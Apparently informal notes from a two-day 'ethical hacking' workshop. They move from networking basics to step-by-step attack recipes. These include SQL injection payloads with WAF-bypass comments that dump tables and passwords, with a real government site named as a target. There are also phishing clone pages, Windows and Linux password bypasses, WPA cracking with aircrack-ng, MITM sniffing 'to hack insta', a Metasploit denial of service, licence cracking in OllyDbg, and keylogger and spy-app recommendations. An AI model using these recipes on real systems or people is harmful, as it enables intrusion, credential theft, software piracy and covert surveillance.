Peace and love

fb.com/rahultyagiofficialpage
instagram.com/iamrahultyagi
twitter.com/rahultyagihacks


Day 1 - LPU
Introduction to Cyber Security
Cyber Security is a part of IT eco system of an private organisation , Govt agencies and individual lifes.

Threats for Banking Sectors
-> Ransomwares
-> DDOS Attacks
-> Social Engineering Attacks
-> Web Application Attacks
-> SQL Injection


Threats to the GOvt.
-> National Security
-> Critical Infrastructure

Privacy to Citizens
-> Identity Theft
-> Critical Information Disclosure in Public


-> For CSE -> Application + Network + Mobile
-> For ECE -> Next Generation Secure Hardware Code
-> Mechanical -> Aviation + Automobile
-> Civil -> Smart cities
-> Others

Basics of Networking
-> Network : Collection of devices with a common purpose of exchanging information and sharing perephiral devices known as a network.

LAN  MAN WAN PAN

-> IP address : Its like your phone number

Local IP : LAN and MAN
Total : 255*255*255*255=????
LAN and MAN
192.168.1.1
172.16.1.1
10.0.0.1
Windows: cmd -> ipconfig
Linux/Unix/Mac: -> terminal -> ifconfig

 Connection-specific DNS Suffix  . : localdomain
 Link-local IPv6 Address . . . . . : fe80::c01f:cb7e
 IPv4 Address. . . . . . . . . . . : 192.168.235.198
 Subnet Mask . . . . . . . . . . . : 255.255.255.0
 Default Gateway . . . . . . . . . : 192.168.235.2-> Mobile IP address


Global IP : IP address given by the ISP to connect to the world.

whatismyip.com

-> Automated IP : Hotspot and Router Network


-> Know Your IP  Local and Global
-> Privacy on Internet
-> Secure Communication
-> Secure Communication : Proxy and VPNs
Web Based Proxy: WHen you use Website to change ur IP address.

www.hidemyass.com
www.kproxy.com
www.ninjaproxy.com

and so on...

Standalone Proxy Servers
When u use the application softwares to change the IP address by going to the non traditional port for the communication.

Filters : Port 80,8080 or 443
Bypass: Application-> 9999, 7777, or etc

Ultra Surf  1.44MB
Hotspot security shield
Download: https://ultrasurf.us/

VPNs:
-> LPU VPN
-> ProXPN
-> TOR Network
Watch Here : https://www.youtube.com/watch?v=DkEqWGF3cvg

Cryptography and Steganography
Cryptography  takes care of two types of data.
1. residing data 2. Transit data

Steganography : Where the goal of teh cryptography is to scrambled the data and information from the third part here the goal of the steganography is to HIDE the data from the third party.


Information Gathering and Cyber Crime Tackling
-> Email Tracing : Identifying Origin of Email
Fake Emails:
-> Email Websites : ekmei.cz
-> Own PHP EMail Script for Fake Emails: github
-> People Search + Information Gathering of People
com.lullar.com --> People Email Searching
-> jantakhoj.com : Gathering Intelectual information about any one any where.


-> Shutting Down Illegal Websites and Blogs
Information Gathering about website which is not available on the website.
-> lpu.in
whois.domaintools.com

Email to : abuse@registrar.schlund.info
Subject: Report Abuse to Domain ID: D425500000000413781-AGRS
Body: Sir this website is hosting illegal content bla bla bla and infinity bla.

Regards
Bla Bla Brother


-> IP address Tracing and Grabbing of Criminal
-> www.whatstheirip.com
-> www.fuglekos.com/ip-grabber/

Link: https://goo.gl/UBr6wD
IP address: 107.167.108.173
iplocation.net : Find ISP Behind the IP address.

-> Case Study : Jaipur College Confession Page - 2013

Malwares
-> Types of Malwares
Virus : A code which infects systems and make them unstable in working.
PS: A true virus cannot spread from one computer to another computer without human assitance.
Worms : It can spread from one place to another without human assistance.

Trojans : AKA RATs(Remote Accessing Tools) used to infect systems and then control overall functionaly  of the system remotely from any where in the world.


Adwares : malwares designed to trick users to click on ads and then generate money from clicks.
- To get RID of these attacks get UBlock plugin in mozilla firefox.

Ransomwares : Once infect your computer then encrypts the data with minimum 1024 bit encryption and then ask for money to get it back.

Types:
Tricky ransomwares : Children
Direct ransomwares : Private Sector


Spywares : Who spy and steal credentials like username password,credit card details and so on like chat and then black mail the person.


Rootkits : Infects the ROm level of the os hence no one can detect it.


Botnets  : Millions of computers got infected by the criminal and they use it for teh DDOS attack.

-> Basic Virus Code in Batch Scripting

-> Trojans
-> Types of Trojans
Download: https://ufile.io/b07a1

Protection from Malwares
-----------------------
1. Viruses and Worms
-> USB Disk Security
2. No Virus thanks exe radar pro


Cyber Forensics
-> Recovering data From HDD, Memory card, Pen Drives, Portabable HDD
-> Easus data Recovery professional
Download: https://ufile.io/cce751

1GB Pendrive: MB : 900MB
Index   Data         Size
1010   setup.exe     100MB
1111   Movie720P.mp4 700MB


-> Stellar Data Recovery: Data Recovery Software - Law Enforcement and Professional Nehru Place recovery Softwares

System Hacking: Bypassing Login of Windows/ Linux/ Mac OS
Linux :Bypassing Kali Linux Password
Step 1: Select Recovery MODe Press E
Step 2: Change ro to rw and add init=/bin/bash at the end of line and Press F10
Step 3: Reset password by typing passwd root and press enter
Step 4: Type new password and restart the system

Bypassing Ubuntu System Password
Step 1: Go to Safe mode
Step 2: Recover Mode
Step 3: Select the second last option from the list i.e SHELL
Step 4: type passwd root
Step 6: Give the new password and confirm password and restart the machine.
Step 7: Fill the new password and enjoy :) .


Windows: Cracking Windows Login Credentials
0-----------------------------------------0

Windows Stores its password in hash format in a file known as SAM(Security Accounts Manager).

C:/windows/system32/config/sam

Active Password Changer

Step 1: Hirenboot CD bootable
Step 2: Boot it and select Boot into AERO Mode
Step 3: Select Hiren BOOT CD Tools
Step 4: Select 3rd option password changer
Step 5: Select ACTIVE PASSWORD changer and remove ur hands from keypad.
Step 6: Select 2nd option ms SAM file
Step 7: Select the account which you want to reset
Step 8: Change the password
Step 9: Restart
Step 10: No password is there Cheers!!! :)


Day 2
-----
Email Hacking: Email hacking is a method or technique in which we trick the user with social engineering to enter his/her credentials mainly userid and password and then login into the account.

There are many ways through which you can attack any email service.
1. Bad Passwords
->phone numbers -> 45%
- char : rahul
- numeric: 93333333
- special:
- complex: R@Hu7
- Dictionary based Password: chair, donkey,temple,punjab
- Pass Phrases aka Robust Password
- *iG3sImG*

2. Phishing : Its a technique in which we make a fake clone page of any login panel and then trick the user to fill the details inside it , its not only related to passwords , these days criminals directly get credit card details and so on which can make money for them directly.

1. Simple Phishing
2. Spear Phishing
3. IDN Homograph Phishing
4. Vishing
5. Smishing


Phishing
--------
1. Gmail Fake Page
2. PHP Script
3. Logs.txt

Making Computer As Server: XAMPP Server
Download: apachefriends.org

C:/xampp/htdocs/gmail
Download Gmail: https://pastebin.com/XCn5WB9q
Nokia.php: https://pastebin.com/QJ4pEUye

email=rahul@gmail.com
password=12345
GET Method


IDN Homograph Attack
--------------------
https://en.wikipedia.org/wiki/IDN_homograph_attack#Cyrillic
"Deepika padukon and other using russian p"

2. Keyloggers
-> Local Keylogger: Family Keylogger 0.22MB
Download: http://www.spyarsenal.com/download.html
Home Work-> Remote Keyloggers: Ardamax Keylogger - Paid

Always use two step verification in gmail.

Web Application Hacking and Security
------------------------------------
OWASP Top 10 Attacks
    A1 Injection.
    A2 Broken Authentication and Session Management.
    A3 Cross-Site Scripting (XSS)
    A4 Insecure Direct Object References.
    A5 Security Misconfiguration.
    A6 Sensitive Data Exposure.
    A7 Missing Function Level Access Control.
    A8 Cross-Site Request Forgery (CSRF)
    A9  Unvalidated Redirects and Forwards
    A10 Using Component with KNown Vulnerabilities

Google Dorks
------------
search for required query of the sql in google "search google for syntax"

Injections: SQL Injection
-------------------------
Webiste: Collection of webpages known as website.

Static Websites: When website is designed in pure HTML and having no database attach to it then we can say its a pure static site mainly in read only mode.


Dynamic Websites: When website carry so many user interaction points from where user can send the data or information inside the website with teh help of database connectivity we can say this is a dynamic website.

For Example: FB and Gmail.com etc.

Attacking Websites from Google Dorks
--------------------------------------
Getting the Critical Information Holding databases from Google.
Title : Blue
URL : Green
Content : Black

Every website take care of the dump of the SQL file as a backup everyday.

SQL Injection: When we send malicious sql code to the website and try to execute in teh database for any desired output.


username=?
password=?
   Login

select * from users where username='?''or'1'='1 and password='?''or'1'='1

'or'1'='1

How to attack and test security for webistes which are protected from Simple SQL Injection and Also Backed up by Web Application Firewalls Designed to protect from hackers.

Target : target.com (Example)
Attack Auditing: Advance SQL Injection with WAF Bypassing

Step 1: multan.gov.pk . FInd any GET method in the URL of the website.
GET METHOD : .php?id=10
POST METHOD : .php

Step 2: Check the validation and Exception Handling of the website URL
target.com/files.php?id=1'

Step 3: Check the total number of Columns are there except ID.
target.com/files.php?id=1 order by 1--+

Step 4: Dump the structure of the two columns on teh right handside.
target.com/files.php?id=1 union select 1,2--+

Attack 1 to Bypass : Upper Lower Case Injection
UnIoN sElEcT
target.com/files.php?id=1 /*!UnIoN*/+/*!sElEcT*/  1,2--+

Attack 2
--------
Inline Execution Comments
/*UnIoN*/+/*!sElEcT*/

Attack 3
--------
Version Based Inline Executable Comments
MY-SQL VERSIONS
5.00.00  When We type in URL : 50000
4.00.00  When We type in URL : 40000
3.00.00  When We type in URL : 30000
2.00.00  When We type in URL : 20000
1.00.00  When We type in URL : 10000


target.com/files.php?id=1 /*!50000UnIoN*/+/*!50000sElEcT*/  1,database()--+


Database --> Tables -> Columns/ROws -> data

Get the Tables

schema: In the database schema holds the responsibility to take care of the entire structure of the database.

Information of all the tables i.e Index
Information of all the columns i.e Index

Table: information_schema.tables
Columns: information_schema.columns

target.com/files.php?id=1 /*!50000UnIoN*/+/*!50000sElEcT*/ 1,/*!table_name*/ /*!from*/ /*!information_schema.tables*/--+


Target Table: users

Get the columns of the users table
target.com/files.php?id=1 /*!50000UnIoN*/+/*!50000sElEcT*/ 1,/*!50000GrOuP_cOnCaT(column_name)*/ /*!50000from*/ /*!50000information_schema.columns*/ /*!50000where*/ /*!50000table_name='users'*/--+


Get the login and password
target.com/files.php?id=1 /*!50000UnIoN*/+/*!50000sElEcT*/ 1,password from users--+


Security Tips for Developers
------------------------------
1. Always use Escape Character Validation at client side and server side.
2. Do not use GET methods on requests in website
3. Always use stored procedures
4. Never accept special character in the login fields or any other fields of the website.
5. Do see OWASP TOP 10 attacks security gudielines before starting a new development project. Via owasp.org

Wifi Hacking and Security
-------------------------
WiFI stands for Wireless Fidelity. Works on 802.11a protocol onwards.

Security
--------
WEP , WPA and WPA-2 PSK Authentication

WEP stands for Wired Equivalent Privacy. It is 802.11's first hardware form of security where the user and WAP are configured with an encryption key of either 64 bits or 128 bits in HEX. It works in this way that when the user attempts to authenticate, the AP issues a random challenge. The user then returns the challenge, encrypted with the key and the AP decrypts this challenge and if it matches the original the client is authenticated otherwise not. The problem with WEP is that the key is static, which is vulnerable, means by using some tools a hacker could use reverse-engineering to extract the encryption key. This process affects the transmission speed.

WPA stands for WiFi Protected Access. It builds upon WEP, to make it more secure by adding extra security mechanism and algorithms to stop unauthorized access. WPA delivers a level of security way beyond anything that WEP can offer. WiFi compliance ensures interoperability between different manufacturer’s equipment. WPA bridges the gap between WEP and 802.11i networks, and has the advantage that the firmware in older equipment may be upgradeable. It's a new security standard adopted by the WiFi Alliance consortium.

WPA2 is similar to WPA, except one thing that it add extra encryption called AES-CCMP. The primary difference between WPA and WPA2 is that WPA2 uses a more advanced encryption technique called AES (Advanced Encryption Standard), allowing for compliance with FIPS140-2 government security requirements. We prefer WPA2 because it has more than three protection levels, making it nearly impossible for computer guru hackers to break the encryption. AES is so good that it blocks statistical analysis of the cipher text. WPA2 is based upon the Institute for Electrical and Electronics Engineers’ (IEEE) 802.11i amendment to the 802.11 standard, which was modified on July 29, 2004.


To Attack and Test the Wifi Security
-----------------------------------
1. Kali Linux OS www.kali.org 2.0 onwards

2.TPLINK Exeternal Wifi Adapter:http://dl.flipkart.com/dl/tp-link-tl-wn722n-150mbps-high-gain-wireless-usb-adapter/p/itmdzusgbtfhhadq?pid=USBDZUSDGUZBGBXR&affid=officialra

3.airmon-ng : This application is used to detect the hardware of the card.

4. airodump-ng : This will help you to select and target a particular wireless hotspot which we want to hack.

5. aircrack-ng : After capturing the KEY of wifi we have to decrypt it or crack it with the help of aircrack-ng.


rahul-->!@#$%

!@#$%  -> X Decrypt this into Rahul gain.

Good News
We know the algorithm which convert text into hash.

!@#$%                       !@#$% <--rahul<-- Dictionary 70%
                               pankaj
                               gaurav
                               hello
                               rahul


Path : usr/share/wordlists/rockyou.txt.gz


  steps for hacking wifi with kali

steps -> to check if wifi is able for hacking , , open "airmon-ng" in terminal
      -> type "airmon-ng start wlan0"
      -> kill if some PID s are giving problems
      -> "kill 2798 " or error you have
      -> "clear" to clear the screen
      -> type "airodump-ng mon 0 " to dump files
      -> copy mac id and channle number an type "airodump-ng --bssid 'enter mac id' -c 'channle number' -w key mon0 "
      -> then press ctrl +z to stop capturing and find key in home>key-01.cap
      -> the key will be in one way algorithm
      -> open dictionary at"usr/share/wordlists/rockyou.txt.gz"
      -> type this to extract rockyou.txt.gz "sgunzip rockyou.txt.gz" but select file first from desktop or wherever the file is
      -> type to compare "aircrack-ng key-01.cap -w rockyou.txt"
      -> password will be show and wifi handshake should must come in the beginning where we are capturing data.

  steps for creating fake hotspot

steps -> start ettercap-G
      -> start unified sniffing
      -> select your wifi
      -> select hosts
      -> scan for hosts
      -> select host list
      -> select adapter as target one and other as target 2
      -> go to mitm and opnremote connectoin >sniff
      -> start>start snifffing
      -> urlsnarf -1 wlan0
      -> start driftnet
  to hack insta use

      -> bettercap
      -> bettercap -I wlan0 --proxy -P POST

 using (metasploit) to shut down other pc on same network remotely
steps -> msfconsole
      -> search maxchannel
      -> use "auxilll...........lids"
      -> show options
      -> nmap 'ip' to check if any of the victims port is open  */
      -> set RHOST 'ip'
      -> show options
      -> exploit
Game Hacking
------------
Game Download: https://ufile.io/926c6
Cheat Engine Download: https://ufile.io/c2c932

Reverse Engineering: Cracking Applications
------------------------------------------
software cracking
use windows xp 32 bit
Software : olly dbg
Target : Perfect Keylogger
Price: $49 Approx
Download: http://www.blazingtools.com/downloads.html

Steps

       ->start olly dbg
       ->close all windows
       ->file>open>exe file of application
       ->assmbly code of exe will show up
       ->view>executable module  or alt+e
       ->look for name of app or something related to it and double click on it
       ->right click>search for all refrence text strings
       ->search for messsage ,which application shows up at the beginning to enter the code
       ->double click on line or message
       ->a black line is coming on left <it means a function . and if the message is at the end , go with the black line to the top to find the stuff   in function
       ->now put a break ppoint in starting of this function using f2
       ->a red line shows a break line is applied
       -> now run the program using play.
       ->now enter your name and key 'fake one'
       ->red line will change into black and application will pause .
       -> execute the line one by one using f8 and keep a look at the output in console window
       ->then two keys will appear in lower outputs and first one will be ours and second one will be the original one ,
       ->now copy the new key , exit the application
       ->open app , enter same username you used earlier and paste the copied key.


Mobile Hacking
--------------
1. Android Deleted Whatsapp,Skype Chat Recovery | Bypassing Lock Screen
Download:https://tinyurl.com/htm42kd
Crack: http://www94.zippyshare.com/v/4S8Dw8VW/file.html
LUCIDROID
airdroid
spyhuman"looks nice and is free"
TruthSPY
Spy2Mobile
MaxSpy
Overcraft

2. Rooting : King Root.apk
   Jailbreaking : Pangu and Taiji Jailbreak